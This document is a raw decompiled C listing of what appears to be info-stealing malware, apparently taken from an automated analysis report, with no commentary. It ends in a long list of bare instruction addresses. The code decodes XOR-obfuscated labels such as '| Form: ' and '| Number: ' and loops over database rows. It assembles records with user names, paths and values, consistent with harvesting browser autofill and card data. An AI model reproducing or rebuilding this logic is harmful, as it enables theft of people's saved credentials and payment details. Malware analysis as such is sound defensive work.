									_t1165 = _t1824;
									do {
										 *(_t1165 + 0x8b554c) =  *(_t1165 + 0x8b554c) ^ 0x0000002e;
										_t1165 = _t1165 + 1;
										__eflags = _t1165 - 0x21;
									} while (_t1165 < 0x21);
									goto L41;
								}
							} else {
								_t1797 =  *(_t1832 - 0x38);
								while(1) {
									_t1171 = E0083EEDB(_t1746, _t1797); // executed
									if(_t1171 != 0x64) {
										break;
									}
									 *((char*)(_t1832 - 4)) = 0x46;
									_t1172 = E0083F301(_t1797, _t1824);
									 *(_t1832 - 0x88) = 0xf;
									 *((intOrPtr*)(_t1832 - 0x8c)) = 0;
									 *((char*)(_t1832 - 0x9c)) = 0;
									L0082DFE8(_t1172);
									 *((char*)(_t1832 - 4)) = 0x47;
									_t1175 = E0082BA52(_t1299, _t1832 - 0x130, _t1832 - 0x9c);
									_t1650 = _t1175;
									 *(_t1832 - 0x34) = _t1175;
									 *((char*)(_t1832 - 4)) = 0x48;
									 *((intOrPtr*)(_t1832 - 0xac)) = 0x41680e52;
									 *((intOrPtr*)(_t1832 - 0xa8)) = 0xe14435c;
									 *((char*)(_t1832 - 0xa4)) = 0x2e;
									_t1828 =  *( *[fs:0x2c]);
									_t1177 =  *0x8b5ce4; // 0x0
									 *(_t1832 - 0x58) = _t1828;
									if(_t1177 >  *((intOrPtr*)(_t1828 + 4))) {
										E0086DB91(_t1177, 0x8b5ce4);
										_t1903 =  *0x8b5ce4 - 0xffffffff;
										_pop(_t1677);
										if( *0x8b5ce4 == 0xffffffff) {
											asm("movsd");
											asm("movsd");
											asm("movsb");
											L0086DFE8(_t1677, _t1903, 0x8960fc);
											 *_t1846 = 0x8b5ce4;
											L0086DB47();
											_t1797 =  *(_t1832 - 0x38);
											_t1828 =  *(_t1832 - 0x58);
										}
										_t1650 =  *(_t1832 - 0x34);
									}
									if( *0x8b4dbc == 0) {
										L27:
										_t1178 = E0082EA3D(_t1832 - 0x178, 0x8b4db4, _t1650);
										 *((char*)(_t1832 - 4)) = 0x49;
										_t1179 = E0082E917(_t1832 - 0x190, _t1178, _t1906, "\n");
										 *((char*)(_t1832 - 4)) = 0x4a;
										E0082D9E5(_t1179);
										E0082DF41(_t1832 - 0x190);
										E0082DF41(_t1832 - 0x178);
										E0082DF41(_t1832 - 0x130);
										 *((char*)(_t1832 - 4)) = 0x46;
										E0082DF41(_t1832 - 0x9c);
										_t1185 = E0083F301(_t1797, 1);
										 *(_t1832 - 0x88) = 0xf;
										 *((intOrPtr*)(_t1832 - 0x8c)) = 0;
										 *((char*)(_t1832 - 0x9c)) = 0;
										L0082DFE8(_t1185);
										 *((char*)(_t1832 - 4)) = 0x4b;
										_t1188 = E0082BA52(_t1299, _t1832 - 0x130, _t1832 - 0x9c);
										_t1665 = _t1188;
										 *(_t1832 - 0x34) = _t1188;
										 *((char*)(_t1832 - 4)) = 0x4c;
										_t1189 =  *0x8b51dc; // 0x0
										 *((intOrPtr*)(_t1832 - 0x50)) = 0x4f780e52;
										 *((intOrPtr*)(_t1832 - 0x4c)) = 0x144b5b42;
										 *((short*)(_t1832 - 0x48)) = 0x2e0e;
										if(_t1189 >  *((intOrPtr*)(_t1828 + 4))) {
											E0086DB91(_t1189, 0x8b51dc);
											_t1908 =  *0x8b51dc - 0xffffffff;
											_pop(_t1675);
											if( *0x8b51dc == 0xffffffff) {
												asm("movsd");
												asm("movsd");
												asm("movsw");
												L0086DFE8(_t1675, _t1908, 0x8960ee);
												 *_t1846 = 0x8b51dc;
												L0086DB47();
												_t1797 =  *(_t1832 - 0x38);
											}
											_t1665 =  *(_t1832 - 0x34);
										}
										_t1824 = 0;
										if( *0x8b51fd == 0) {
											L34:
											_t1746 = E0082EA3D(_t1832 - 0x178, 0x8b51f4, _t1665);
											 *((char*)(_t1832 - 4)) = 0x4d;
											_t1191 = E0082E917(_t1832 - 0x190, _t1190, _t1910, "\n\n");
											 *((char*)(_t1832 - 4)) = 0x4e;
											E0082D9E5(_t1191);
											E0082DF41(_t1832 - 0x190);
											E0082DF41(_t1832 - 0x178);
											E0082DF41(_t1832 - 0x130);
											E0082DF41(_t1832 - 0x9c);
											 *0x8b48a4 =  *0x8b48a4 + 1;
											 *((intOrPtr*)(_t1832 - 4)) = 3;
											continue;
										} else {
											_t1197 = 0;
											do {
												 *(_t1197 + 0x8b51f4) =  *(_t1197 + 0x8b51f4) ^ 0x0000002e;
												_t1197 = _t1197 + 1;
												_t1910 = _t1197 - 0xa;
											} while (_t1197 < 0xa);
											goto L34;
										}
									}
									_t1201 = 0;
									do {
										 *(_t1201 + 0x8b4db4) =  *(_t1201 + 0x8b4db4) ^ 0x0000002e;
										_t1201 = _t1201 + 1;
										_t1906 = _t1201 - 9;
									} while (_t1201 < 9);
									goto L27;
								}
								L42:
								E0083EA32(_t1797);
								_t1079 = E008290B3();
								__eflags =  *((char*)(_t1079 + 0x5f));
								if(__eflags == 0) {
									L45:
									_t1747 = _t1079;
									_t1080 = E0084C9FB( *((intOrPtr*)(_t1832 - 0xa0)), _t1079, __eflags, 0xffffffff, 1, _t1832 - 0x38, _t1824);
									_t1847 = _t1846 + 0x10;
									__eflags = _t1080;
									if(_t1080 != 0) {
										goto L188;
									}
									_t1798 =  *[fs:0x2c];
									asm("movaps xmm0, [0x8a8c40]");
									_t1081 =  *0x8b5ba4; // 0x80000048
									asm("movups [ebp-0xe4], xmm0");
									_t1553 =  *_t1798;
									 *((intOrPtr*)(_t1832 - 0xd4)) = 0x4f5e405b;
									 *((intOrPtr*)(_t1832 - 0xd0)) = 0x4a4b454d;
									 *((short*)(_t1832 - 0xcc)) = 0x2e24;
									__eflags = _t1081 -  *((intOrPtr*)(_t1553 + 4));
									if(_t1081 >  *((intOrPtr*)(_t1553 + 4))) {
										E0086DB91(_t1081, 0x8b5ba4);
										__eflags =  *0x8b5ba4 - 0xffffffff;
										if( *0x8b5ba4 == 0xffffffff) {
											E0082D0B8(0x8b5af8, _t1832 - 0xe4);
											L0086DFE8(0x8b5af8, __eflags, 0x8960bb);
											 *_t1847 = 0x8b5ba4;
											L0086DB47();
										}
									}
									__eflags =  *0x8b5b11;
									if( *0x8b5b11 == 0) {
										L51:
										E0082D9C4(0x8b5af8);
										while(1) {
											_t1812 =  *(_t1832 - 0x38);
											_t1083 = E0083EEDB(_t1747,  *(_t1832 - 0x38)); // executed
											__eflags = _t1083 - 0x64;
											if(__eflags != 0) {
												goto L189;
											}
											 *((char*)(_t1832 - 4)) = 0x50;
											 *(_t1832 - 0x58) = E0083F23A(_t1812, 3);
											_t1085 = E0083F301(_t1812, 3);
											_pop(_t1559);
											 *(_t1832 - 0x34) = _t1085;
											_t1088 = L0082EC6B(_t1299, _t1559, _t1747, __eflags, _t1832 - 0xac, _t1832 + 8,  *(_t1832 - 0x58));
											_t1848 = _t1847 - 0x18;
											_t1560 = _t1848;
											 *((intOrPtr*)(_t1560 + 0x10)) = 0;
											 *((intOrPtr*)(_t1560 + 0x14)) = 0;
											E0082E0AB(_t1560,  *_t1088 + 0x28);
											_t1092 = E008228AE(_t1299, _t1832 - 0xc4,  *(_t1832 - 0x34), __eflags);
											_t1847 = _t1848 + 0x1c;
											 *((intOrPtr*)(_t1832 - 0x18)) = _t1092;
											 *((char*)(_t1832 - 4)) = 0x51;
											_t1562 =  *_t1798;
											_t1093 =  *0x8b5730; // 0x0
											 *((intOrPtr*)(_t1832 - 0x80)) = 0x5b600e52;
											 *((intOrPtr*)(_t1832 - 0x7c)) = 0x5c4b4c43;
											 *((short*)(_t1832 - 0x78)) = 0xe14;
											 *((char*)(_t1832 - 0x76)) = 0x2e;
											 *(_t1832 - 0x34) = _t1562;
											__eflags = _t1093 -  *((intOrPtr*)(_t1562 + 4));
											if(_t1093 >  *((intOrPtr*)(_t1562 + 4))) {
												E0086DB91(_t1093, 0x8b5730);
												__eflags =  *0x8b5730 - 0xffffffff;
												_pop(_t1634);
												if(__eflags == 0) {
													asm("movsd");
													asm("movsd");
													asm("movsw");
													asm("movsb");
													L0086DFE8(_t1634, __eflags, 0x896082);
													 *_t1847 = 0x8b5730;
													L0086DB47();
													_t1812 =  *(_t1832 - 0x38);
												}
											}
											__eflags =  *0x8b5756;
											if( *0x8b5756 == 0) {
												L59:
												 *((intOrPtr*)(_t1832 - 0x5c)) = E0083F301(_t1812, 2);
												_t1095 = E0083F301(_t1812, 1);
												_t1799 = 0xf;
												 *((intOrPtr*)(_t1832 - 0x64)) = 0;
												 *(_t1832 - 0x60) = _t1799;
												 *((char*)(_t1832 - 0x74)) = 0;
												L0082DFE8(_t1095);
												_t1569 =  *(_t1832 - 0x34);
												 *((char*)(_t1832 - 4)) = 0x52;
												_t1098 =  *0x8b50a0; // 0x0
												 *((intOrPtr*)(_t1832 - 0x44)) = 0x1630e52;
												 *((intOrPtr*)(_t1832 - 0x40)) = 0x2e0e1477;
												__eflags = _t1098 -  *((intOrPtr*)(_t1569 + 4));
												if(_t1098 >  *((intOrPtr*)(_t1569 + 4))) {
													E0086DB91(_t1098, 0x8b50a0);
													__eflags =  *0x8b50a0 - 0xffffffff;
													if(__eflags == 0) {
														 *0x8b6034 =  *((intOrPtr*)(_t1832 - 0x44));
														 *0x8b6038 =  *((intOrPtr*)(_t1832 - 0x40));
														L0086DFE8( *((intOrPtr*)(_t1832 - 0x40)), __eflags, 0x896091);
														 *_t1847 = 0x8b50a0;
														L0086DB47();
													}
												}
												__eflags =  *0x8b603b;
												if( *0x8b603b == 0) {
													L65:
													_t1099 = E0083F301(_t1812, 0);
													 *(_t1832 - 0x88) = _t1799;
													 *((intOrPtr*)(_t1832 - 0x8c)) = 0;
													 *((char*)(_t1832 - 0x9c)) = 0;
													L0082DFE8(_t1099);
													 *((char*)(_t1832 - 4)) = 0x53;
													 *(_t1832 - 0x58) = E0082BA52(_t1299, _t1832 - 0x1c0, _t1832 - 0x9c);
													_t1575 =  *(_t1832 - 0x34);
													 *((char*)(_t1832 - 4)) = 0x54;
													_t1103 =  *0x8b6220;
													 *((intOrPtr*)(_t1832 - 0x50)) = 0x4f600e52;
													 *((intOrPtr*)(_t1832 - 0x4c)) = 0xe144b43;
													 *((char*)(_t1832 - 0x48)) = 0x2e;
													__eflags =  *0x8b6220 -  *((intOrPtr*)(_t1575 + 4));
													if( *0x8b6220 >  *((intOrPtr*)(_t1575 + 4))) {
														E0086DB91(_t1103, 0x8b6220);
														__eflags =  *0x8b6220 - 0xffffffff;
														_pop(_t1629);
														if(__eflags == 0) {
															asm("movsd");
															asm("movsd");
															asm("movsb");
															L0086DFE8(_t1629, __eflags, 0x8960a0);
															 *_t1847 = 0x8b6220;
															L0086DB47();
														}
														_t1575 =  *(_t1832 - 0x34);
													}
													__eflags =  *0x8b5c48;
													if( *0x8b5c48 == 0) {
														L72:
														_t1104 =  *0x8b4c9c; // 0x0
														 *((intOrPtr*)(_t1832 - 0x28)) = 0x4c750e52;
														 *((intOrPtr*)(_t1832 - 0x24)) = 0x5d59415c;
														 *((intOrPtr*)(_t1832 - 0x20)) = 0xe145c4b;
														 *((char*)(_t1832 - 0x1c)) = 0x2e;
														__eflags = _t1104 -  *((intOrPtr*)(_t1575 + 4));
														if(_t1104 >  *((intOrPtr*)(_t1575 + 4))) {
															E0086DB91(_t1104, 0x8b4c9c);
															__eflags =  *0x8b4c9c - 0xffffffff;
															_pop(_t1627);
															if(__eflags == 0) {
																asm("movsd");
																asm("movsd");
																asm("movsd");
																asm("movsb");
																L0086DFE8(_t1627, __eflags, 0x8960ad);
																 *_t1847 = 0x8b4c9c;
																L0086DB47();
															}
														}
														__eflags =  *0x8b5fe4;
														if( *0x8b5fe4 == 0) {
															L78:
															_t1106 = E0082E9EC(_t1299, _t1832 - 0x298, 0x8b5fd8);
															 *((char*)(_t1832 - 4)) = 0x55;
															_t1107 = E0082E917(_t1832 - 0x280, _t1106, __eflags, "] - [user: ");
															 *((char*)(_t1832 - 4)) = 0x56;
															_t1108 = E0082E981(_t1832 - 0x268, _t1107, 0x8b2abc);
															 *((char*)(_t1832 - 4)) = 0x57;
															_t1109 = E0082E917(_t1832 - 0x250, _t1108, __eflags, "]\n");
															 *((char*)(_t1832 - 4)) = 0x58;
															_t1110 = E0082E917(_t1832 - 0x238, _t1109, __eflags, "|\n");
															 *((char*)(_t1832 - 4)) = 0x59;
															_t1111 = E0082E917(_t1832 - 0x220, _t1110, __eflags, 0x8b5c40);
															 *((char*)(_t1832 - 4)) = 0x5a;
															E0082FA3B(_t1832 - 0x130,  *((intOrPtr*)(_t1832 - 0x15)), _t1111,  *(_t1832 - 0x58), _t1832 + 8);
															_t1801 =  *(_t1832 - 0x54) | 0x00000100;
															 *(_t1832 - 0x54) = _t1801;
															 *((char*)(_t1832 - 4)) = 0x5b;
															_t1113 = E0082E917(_t1832 - 0x208, _t1832 - 0x130, __eflags, "\n");
															 *((char*)(_t1832 - 4)) = 0x5c;
															_t1114 = E0082E917(_t1832 - 0x1f0, _t1113, __eflags, 0x8b6034);
															 *((char*)(_t1832 - 4)) = 0x5d;
															_push(_t1832 - 0x74);
															_push(_t1114);
															E0082FA3B(_t1832 - 0x100);
															_t1802 = _t1801 | 0x00000200;
															 *(_t1832 - 0x54) = _t1802;
															 *((char*)(_t1832 - 4)) = 0x5e;
															_t1116 = E0082E917(_t1832 - 0x1d8, _t1832 - 0x100, __eflags, "/");
															 *((char*)(_t1832 - 4)) = 0x5f;
															_t1117 = E0082E917(_t1832 - 0x2c8, _t1116, __eflags,  *((intOrPtr*)(_t1832 - 0x5c)));
															 *((char*)(_t1832 - 4)) = 0x60;
															_t1118 = E0082E917(_t1832 - 0x2b0, _t1117, __eflags, "\n");
															 *((char*)(_t1832 - 4)) = 0x61;
															_t1119 = E0082E917(_t1832 - 0x178, _t1118, __eflags, 0x8b574c);
															 *((char*)(_t1832 - 4)) = 0x62;
															E0082FA3B(_t1832 - 0x118,  *((intOrPtr*)(_t1832 - 0x15)), _t1119,  *((intOrPtr*)(_t1832 - 0x18)),  *((intOrPtr*)(_t1832 - 0x15)));
															 *(_t1832 - 0x54) = _t1802 | 0x00000400;
															_t1747 = _t1832 - 0x118;
															 *((char*)(_t1832 - 4)) = 0x63;
															_t1121 = E0082E917(_t1832 - 0x190, _t1832 - 0x118, __eflags, "\n\n");
															 *((char*)(_t1832 - 4)) = 0x64;
															E0082D9E5(_t1121);
															E0082DF41(_t1832 - 0x190);
															E0082DF41(_t1832 - 0x118);
															E0082DF41(_t1832 - 0x178);
															E0082DF41(_t1832 - 0x2b0);
															E0082DF41(_t1832 - 0x2c8);
															E0082DF41(_t1832 - 0x1d8);
															E0082DF41(_t1832 - 0x100);
															E0082DF41(_t1832 - 0x1f0);
															E0082DF41(_t1832 - 0x208);
															E0082DF41(_t1832 - 0x130);
															E0082DF41(_t1832 - 0x220);
															E0082DF41(_t1832 - 0x238);
															E0082DF41(_t1832 - 0x250);
															E0082DF41(_t1832 - 0x268);
															E0082DF41(_t1832 - 0x280);
															E0082DF41(_t1832 - 0x298);
															E0082DF41(_t1832 - 0x1c0);
															E0082DF41(_t1832 - 0x9c);
															E0082DF41(_t1832 - 0x74);
															E0082DF41(_t1832 - 0xc4);
															 *0x8b4884 =  *0x8b4884 + 1;
															 *((intOrPtr*)(_t1832 - 4)) = 3;
															_t1798 =  *[fs:0x2c];
															continue;
														} else {
															_t1143 = 0;
															__eflags = 0;
															do {
																 *(_t1143 + 0x8b5fd8) =  *(_t1143 + 0x8b5fd8) ^ 0x0000002e;
																_t1143 = _t1143 + 1;
																__eflags = _t1143 - 0xd;
															} while (_t1143 < 0xd);
															goto L78;
														}
													} else {
														_t1147 = 0;
														__eflags = 0;
														do {
															 *(_t1147 + 0x8b5c40) =  *(_t1147 + 0x8b5c40) ^ 0x0000002e;
															_t1147 = _t1147 + 1;
															__eflags = _t1147 - 9;
														} while (_t1147 < 9);
														goto L72;
													}
												} else {
													_t1151 = 0;
													__eflags = 0;
													do {
														 *(_t1151 + 0x8b6034) =  *(_t1151 + 0x8b6034) ^ 0x0000002e;
														_t1151 = _t1151 + 1;
														__eflags = _t1151 - 8;
													} while (_t1151 < 8);
													goto L65;
												}
											} else {
												_t1156 = 0;
												__eflags = 0;
												do {
													 *(_t1156 + 0x8b574c) =  *(_t1156 + 0x8b574c) ^ 0x0000002e;
													_t1156 = _t1156 + 1;
													__eflags = _t1156 - 0xb;
												} while (_t1156 < 0xb);
												goto L59;
											}
										}
										goto L189;
									} else {
										do {
											 *(_t1824 + 0x8b5af8) =  *(_t1824 + 0x8b5af8) ^ 0x0000002e;
											_t1824 = _t1824 + 1;
											__eflags = _t1824 - 0x1a;
										} while (_t1824 < 0x1a);
										goto L51;
									}
								}
								_t1639 = _t1824;
								do {
									asm("movups xmm0, [ecx+eax]");
									asm("movaps xmm1, [0x8a8cb0]");
									asm("pxor xmm1, xmm0");
									asm("movups [ecx+eax], xmm1");
									_t1639 = _t1639 + 0x10;
									__eflags = _t1639 - 0x60;
								} while (__eflags < 0);
								goto L45;
							}
						} else {
							_t1205 = 0;
							do {
								 *(_t1205 + 0x8b5068) =  *(_t1205 + 0x8b5068) ^ 0x0000002e;
								_t1205 = _t1205 + 1;
								_t1899 = _t1205 - 0x21;
							} while (_t1205 < 0x21);
							goto L17;
						}
					}
				}
			}













































































































































































































                                    0x00827009
                                    0x0082700e
                                    0x00827013
                                    0x00827019
                                    0x0082701e
                                    0x00827021
                                    0x00827023
                                    0x00827026
                                    0x00827029
                                    0x0082702c
                                    0x00827035
                                    0x0082703c
                                    0x00827048
                                    0x00827057
                                    0x0082705d
                                    0x00827061
                                    0x0082706d
                                    0x00828ee5
                                    0x00828ee8
                                    0x00828ef0
                                    0x00828efa
                                    0x00828f03
                                    0x00827073
                                    0x00827075
                                    0x0082707f
                                    0x00827084
                                    0x00827091
                                    0x00827097
                                    0x008270a7
                                    0x008270ab
                                    0x008270b7
                                    0x008270bf
                                    0x008270c5
                                    0x008270ca
                                    0x008270cc
                                    0x008270cf
                                    0x008270d6
                                    0x008270de
                                    0x008270e3
                                    0x008270eb
                                    0x008270ef
                                    0x008270f9
                                    0x00827101
                                    0x0082710b
                                    0x0082710f
                                    0x00827119
                                    0x0082711d
                                    0x00827127
                                    0x0082712b
                                    0x00827135
                                    0x00827139
                                    0x00827143
                                    0x00827147
                                    0x00827151
                                    0x00827155
                                    0x0082715f
                                    0x00827164
                                    0x0082716e
                                    0x00827173
                                    0x00827178
                                    0x0082717a
                                    0x0082717d
                                    0x00827180
                                    0x00827187
                                    0x0082718c
                                    0x0082718f
                                    0x00827193
                                    0x00827197
                                    0x0082719a
                                    0x008271a1
                                    0x008271a6
                                    0x008271aa
                                    0x008271af
                                    0x008271af
                                    0x008271b2
                                    0x008271c3
                                    0x008271cb
                                    0x008271d2
                                    0x008271d6
                                    0x008271e0
                                    0x008271e4
                                    0x008271ee
                                    0x008271f2
                                    0x008271fc
                                    0x00827200
                                    0x0082720d
                                    0x00827211
                                    0x0082721e
                                    0x00827224
                                    0x00827230
                                    0x00827234
                                    0x00827241
                                    0x00827245
                                    0x00827252
                                    0x00827256
                                    0x00827263
                                    0x00827267
                                    0x00827274
                                    0x00827278
                                    0x00827284
                                    0x00827288
                                    0x00827295
                                    0x00827299
                                    0x008272a3
                                    0x008272a7
                                    0x008272b1
                                    0x008272b5
                                    0x008272bf
                                    0x008272c3
                                    0x008272cc
                                    0x008272d0
                                    0x008272da
                                    0x008272de
                                    0x008272e8
                                    0x008272ec
                                    0x008272f6
                                    0x008272fd
                                    0x00827307
                                    0x0082730b
                                    0x00827315
                                    0x00827319
                                    0x00827323
                                    0x00827328
                                    0x00827332
                                    0x00827342
                                    0x00827347
                                    0x0082734c
                                    0x0082734e
                                    0x00827351
                                    0x00827354
                                    0x0082735b
                                    0x00827360
                                    0x00827363
                                    0x00827367
                                    0x0082736b
                                    0x0082736e
                                    0x00827375
                                    0x0082737a
                                    0x0082737e
                                    0x00827383
                                    0x00827383
                                    0x00827389
                                    0x0082738d
                                    0x0082738d
                                    0x0082739f
                                    0x008273a5
                                    0x008273ab
                                    0x008273ae
                                    0x00828ece
                                    0x00828ed4
                                    0x00828ee0
                                    0x00000000
                                    0x00828ee0
                                    0x008273b4
                                    0x008273b6
                                    0x008273b8
                                    0x008273bb
                                    0x008273be
                                    0x008288b0
                                    0x008288b5
                                    0x008288b9
                                    0x008288c7
                                    0x008288cc
                                    0x008288d9
                                    0x008288de
                                    0x008288e6
                                    0x008288e8
                                    0x00828ebf
                                    0x00828ec4
                                    0x00828ec4
                                    0x00828ec7
                                    0x00828ec8
                                    0x00828ecd
                                    0x00000000
                                    0x00828ecd
                                    0x008288f3
                                    0x008288f8
                                    0x008288fb
                                    0x008288fc
                                    0x00828902
                                    0x00828905
                                    0x00000000
                                    0x00000000
                                    0x0082890e
                                    0x00828912
                                    0x0082891f
                                    0x00828924
                                    0x00828927
                                    0x0082892a
                                    0x0082892d
                                    0x00828935
                                    0x00828939
                                    0x00828942
                                    0x00828951
                                    0x00828957
                                    0x0082895d
                                    0x00828965
                                    0x00828969
                                    0x00828972
                                    0x00828981
                                    0x00828987
                                    0x0082898d
                                    0x00828995
                                    0x00828999
                                    0x008289a5
                                    0x008289ab
                                    0x008289ac
                                    0x008289bb
                                    0x008289c0
                                    0x008289c5
                                    0x008289cd
                                    0x008289d0
                                    0x008289d3
                                    0x008289e1
                                    0x008289e6
                                    0x008289e9
                                    0x008289f8
                                    0x008289fa
                                    0x008289ff
                                    0x00828a01
                                    0x00828e73
                                    0x00828e79
                                    0x00828e84
                                    0x00828e8f
                                    0x00828e97
                                    0x00828e9c
                                    0x00000000
                                    0x00828e9c
                                    0x00828a0f
                                    0x00828a14
                                    0x00828a16
                                    0x00828a22
                                    0x00828a22
                                    0x00828a38
                                    0x00828a3b
                                    0x00828a45
                                    0x00828a4c
                                    0x00828a53
                                    0x00828a57
                                    0x00828a59
                                    0x00828a5e
                                    0x00828a61
                                    0x00828a67
                                    0x00828a6e
                                    0x00828a73
                                    0x00828a7a
                                    0x00828a7b
                                    0x00828a8a
                                    0x00828a8b
                                    0x00828a8c
                                    0x00828a8d
                                    0x00828a92
                                    0x00828a99
                                    0x00828a9e
                                    0x00828aa1
                                    0x00828a7b
                                    0x00828aa2
                                    0x00828aa9
                                    0x00828aba
                                    0x00828acb
                                    0x00828ace
                                    0x00828ad2
                                    0x00828ad7
                                    0x00828ade
                                    0x00828ae5
                                    0x00828aeb
                                    0x00828af1
                                    0x00828af8
                                    0x00828afd
                                    0x00828b04
                                    0x00828b05
                                    0x00828b14
                                    0x00828b15
                                    0x00828b16
                                    0x00828b18
                                    0x00828b1d
                                    0x00828b24
                                    0x00828b29
                                    0x00828b2c
                                    0x00828b05
                                    0x00828b2d
                                    0x00828b34
                                    0x00828b45
                                    0x00828b56
                                    0x00828b59
                                    0x00828b5d
                                    0x00828b62
                                    0x00828b69
                                    0x00828b70
                                    0x00828b74
                                    0x00828b7a
                                    0x00828b81
                                    0x00828b86
                                    0x00828b8d
                                    0x00828b8e
                                    0x00828b9d
                                    0x00828b9e
                                    0x00828b9f
                                    0x00828ba0
                                    0x00828ba5
                                    0x00828bac
                                    0x00828bb1
                                    0x00828bb4
                                    0x00828b8e
                                    0x00828bb5
                                    0x00828bbc
                                    0x00828bcd
                                    0x00828bcd
                                    0x00828bd2
                                    0x00828bd9
                                    0x00828be0
                                    0x00828be7
                                    0x00828beb
                                    0x00828bf1
                                    0x00828bf8
                                    0x00828bfd
                                    0x00828c04
                                    0x00828c05
                                    0x00828c14
                                    0x00828c15
                                    0x00828c16
                                    0x00828c17
                                    0x00828c18
                                    0x00828c1d
                                    0x00828c24
                                    0x00828c29
                                    0x00828c05
                                    0x00828c2a
                                    0x00828c31
                                    0x00828c42
                                    0x00828c51
                                    0x00828c5e
                                    0x00828c68
                                    0x00828c75
                                    0x00828c7f
                                    0x00828c8c
                                    0x00828c96
                                    0x00828ca3
                                    0x00828cad
                                    0x00828cba
                                    0x00828cc4
                                    0x00828cca
                                    0x00828cdb
                                    0x00828ce3
                                    0x00828ce6
                                    0x00828cf4
                                    0x00828cfe
                                    0x00828d0b
                                    0x00828d15
                                    0x00828d1b
                                    0x00828d1e
                                    0x00828d28
                                    0x00828d2c
                                    0x00828d31
                                    0x00828d34
                                    0x00828d42
                                    0x00828d4c
                                    0x00828d59
                                    0x00828d63
                                    0x00828d6c
                                    0x00828d7a
                                    0x00828d82
                                    0x00828d8a
                                    0x00828d90
                                    0x00828d9a
                                    0x00828da6
                                    0x00828daa
                                    0x00828db5
                                    0x00828dc0
                                    0x00828dcb
                                    0x00828dd6
                                    0x00828de1
                                    0x00828dec
                                    0x00828df7
                                    0x00828e02
                                    0x00828e0d
                                    0x00828e18
                                    0x00828e23
                                    0x00828e2e
                                    0x00828e39
                                    0x00828e44
                                    0x00828e4f
                                    0x00828e5a
                                    0x00828e65
                                    0x00828e6a
                                    0x00828e6a
                                    0x00828e70
                                    0x00000000
                                    0x00828c33
                                    0x00828c33
                                    0x00828c33
                                    0x00828c35
                                    0x00828c35
                                    0x00828c3c
                                    0x00828c3d
                                    0x00828c3d
                                    0x00000000
                                    0x00828c35
                                    0x00828bbe
                                    0x00828bbe
                                    0x00828bbe
                                    0x00828bc0
                                    0x00828bc0
                                    0x00828bc7
                                    0x00828bc8
                                    0x00828bc8
                                    0x00000000
                                    0x00828bc0
                                    0x00828b36
                                    0x00828b36
                                    0x00828b36
                                    0x00828b38
                                    0x00828b38
                                    0x00828b3f
                                    0x00828b40
                                    0x00828b40
                                    0x00000000
                                    0x00828b38
                                    0x00828aab
                                    0x00828aab
                                    0x00828aab
                                    0x00828aad
                                    0x00828aad
                                    0x00828ab4
                                    0x00828ab5
                                    0x00828ab5
                                    0x00000000
                                    0x00828aad
                                    0x00828aa9
                                    0x00000000
                                    0x008288fb
                                    0x008288bb
                                    0x008288bb
                                    0x008288bd
                                    0x008288bd
                                    0x008288c1
                                    0x008288c2
                                    0x008288c2
                                    0x00000000
                                    0x008288bd
                                    0x008273c4
                                    0x008273c7
                                    0x00827e16
                                    0x00827e17
                                    0x00827e1d
                                    0x00827e23
                                    0x00827e29
                                    0x00827e2f
                                    0x00827e35
                                    0x00827e3b
                                    0x00827e46
                                    0x00827e4b
                                    0x00827e52
                                    0x00827e59
                                    0x00827e5b
                                    0x00827e61
                                    0x00827e63
                                    0x00827e69
                                    0x00827e6e
                                    0x00827e76
                                    0x00827e78
                                    0x00827e7b
                                    0x00827e83
                                    0x00827e88
                                    0x00827e8e
                                    0x00827e94
                                    0x00827e9a
                                    0x00827e9b
                                    0x00827e9b
                                    0x00827e9b
                                    0x00827e9d
                                    0x00827ea4
                                    0x00827eb3
                                    0x00827ebb
                                    0x00827ec0
                                    0x00827ec2
                                    0x00827ef1
                                    0x00827ef3
                                    0x00827ef7
                                    0x00827f05
                                    0x00827f05
                                    0x00827f0c
                                    0x00827f11
                                    0x00827f15
                                    0x00827f1c
                                    0x00827f23
                                    0x00827f29
                                    0x00827f2b
                                    0x00827f31
                                    0x00827f36
                                    0x00827f3e
                                    0x00827f49
                                    0x00827f53
                                    0x00827f59
                                    0x00827f5f
                                    0x00827f3e
                                    0x00827f60
                                    0x00827f67
                                    0x00827f78
                                    0x00827f83
                                    0x00827f8a
                                    0x00827f92
                                    0x00827f9c
                                    0x00827fa3
                                    0x00827fa9
                                    0x00827fab
                                    0x00827fad
                                    0x00827fb1
                                    0x00827fb5
                                    0x00827fb5
                                    0x00827fc0
                                    0x00827fcb
                                    0x00827fcf
                                    0x00827fd4
                                    0x00827fd4
                                    0x00827fea
                                    0x00827ff8
                                    0x00827ffd
                                    0x00828000
                                    0x00828002
                                    0x008283fe
                                    0x00828403
                                    0x0082840d
                                    0x00828415
                                    0x0082841a
                                    0x0082841c
                                    0x00828891
                                    0x00828897
                                    0x008288a2
                                    0x008288a6
                                    0x00000000
                                    0x008288a6
                                    0x00828424
                                    0x00828430
                                    0x00828434
                                    0x0082843b
                                    0x0082843f
                                    0x00828450
                                    0x0082845a
                                    0x00828462
                                    0x0082846f
                                    0x0082847f
                                    0x00828489
                                    0x0082848f
                                    0x00828490
                                    0x00828491
                                    0x0082849b
                                    0x0082849e
                                    0x008284a9
                                    0x008284b4
                                    0x008284bf
                                    0x008284ca
                                    0x008284d5
                                    0x008284d9
                                    0x008284de
                                    0x008284e3
                                    0x008284e5
                                    0x008284e8
                                    0x008284eb
                                    0x008284f5
                                    0x008284fa
                                    0x008284fd
                                    0x00828501
                                    0x00828505
                                    0x00828508
                                    0x00828512
                                    0x00828517
                                    0x0082851b
                                    0x00828520
                                    0x00828523
                                    0x0082852a
                                    0x00828536
                                    0x0082853a
                                    0x0082853c
                                    0x00828541
                                    0x00828544
                                    0x0082854a
                                    0x00828551
                                    0x00828556
                                    0x0082855d
                                    0x0082855e
                                    0x00828560
                                    0x0082856d
                                    0x0082856e
                                    0x00828570
                                    0x00828571
                                    0x00828576
                                    0x0082857d
                                    0x00828582
                                    0x00828585
                                    0x0082855e
                                    0x00828586
                                    0x0082858d
                                    0x0082859e
                                    0x008285a9
                                    0x008285ae
                                    0x008285b0
                                    0x00828624
                                    0x00828624
                                    0x00828631
                                    0x00828636
                                    0x0082863d
                                    0x00828640
                                    0x00828647
                                    0x0082864e
                                    0x00828655
                                    0x0082865b
                                    0x00828661
                                    0x00828668
                                    0x0082866d
                                    0x00828674
                                    0x00828675
                                    0x00828684
                                    0x00828685
                                    0x00828686
                                    0x00828687
                                    0x00828689
                                    0x0082868e
                                    0x00828695
                                    0x0082869a
                                    0x0082869d
                                    0x0082869d
                                    0x008286a0
                                    0x00828675
                                    0x008286a1
                                    0x008286a8
                                    0x008286b9
                                    0x008286b9
